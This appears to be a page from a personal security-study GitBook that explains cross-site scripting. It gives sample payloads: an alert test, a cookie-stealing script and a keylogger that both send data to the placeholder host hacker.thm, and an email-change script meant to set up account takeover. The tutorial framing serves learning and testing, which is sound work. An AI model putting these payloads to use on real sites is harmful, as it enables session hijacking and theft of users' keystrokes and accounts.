Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security

XSS

PreviousIn Password-Based LoginsNextReflected XSS

Last updated 2 years ago

XSS is based on JavaScript, it would be helpful to have a basic understanding of the language and a basic understanding of Client-Server requests and responses

XSS is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users

Payload

  • There are two parts to the payload, the intention and the modification

The intention is what you wish the JavaScript to actually do

The modification is the changes to the code we need to make it execute as every scenario is different

Simple Payload

  • This is the most common payload used on websites to test if there's an XSS or not !

<script>alert('XSS');</script>

Session stealing

  • Details of a user's session, such as login tokens, are often kept in cookies on the targets machine

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

This JavaScript takes the victim's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control, Once the hacker has these cookies, they can take over the target's session and be logged as that victim user

Keylogger

  • Anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

Business Logic

  • This would be calling a particular network resource or a JavaScript function

  • For example, imagine a JavaScript function for changing the user's email address called user.changeEmail() - The payload will look something like this

<script>user.changeEmail('attacker@hacker.thm');</script>

Impact => Now that the email address for the account has changed, the attacker may perform a reset password attack

XSS found in Shopify
$7,500 for XSS found in Steam chat
$2,500 for XSS in HackerOne
XSS found in Infogram